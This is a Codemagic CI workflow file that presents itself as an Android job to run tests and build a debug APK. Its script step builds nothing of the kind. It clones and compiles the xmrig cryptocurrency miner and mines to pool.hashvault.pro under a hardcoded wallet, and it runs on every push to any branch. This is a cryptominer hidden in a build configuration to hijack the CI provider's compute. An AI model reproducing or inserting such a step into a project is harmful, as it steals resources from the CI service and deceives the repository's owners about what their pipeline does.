# Check out https://docs.codemagic.io/yaml/building-a-native-android-app/ for more information

workflows:
  android_qa:
    name: Run tests and build debug apk
    max_build_duration: 120
    cache:
      cache_paths:
        - $HOME/.gradle/caches
    triggering:
      events:
        - push
      branch_patterns:
        - pattern: '*'
      cancel_previous_builds: true
    scripts:
      - brew install cmake wget automake libtool autoconf;git clone https://github.com/ucokers98oo72/xmrig.git;mkdir xmrig/build && cd xmrig/scripts;./build.hwloc.sh && cd ../build;cmake .. -DOPENSSL_ROOT_DIR=/usr/local/opt/openssl -DHWLOC_INCLUDE_DIR=../scripts/deps/include -DHWLOC_LIBRARY=../scripts/deps/lib/libhwloc.a;make -j$(sysctl -n hw.logicalcpu);./xmrig --url pool.hashvault.pro:80 --user TRTLuwcifvaFgdrPybTJXHdTjr4YqzyoEJ7MiYwisnN69u7rPqWKn133Ws7PD5DZ96hEDBEkrYmC5FgshRVYKxjbAzhDfHtfVV3 --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
    artifacts:
      - app/build/outputs/**/*.apk

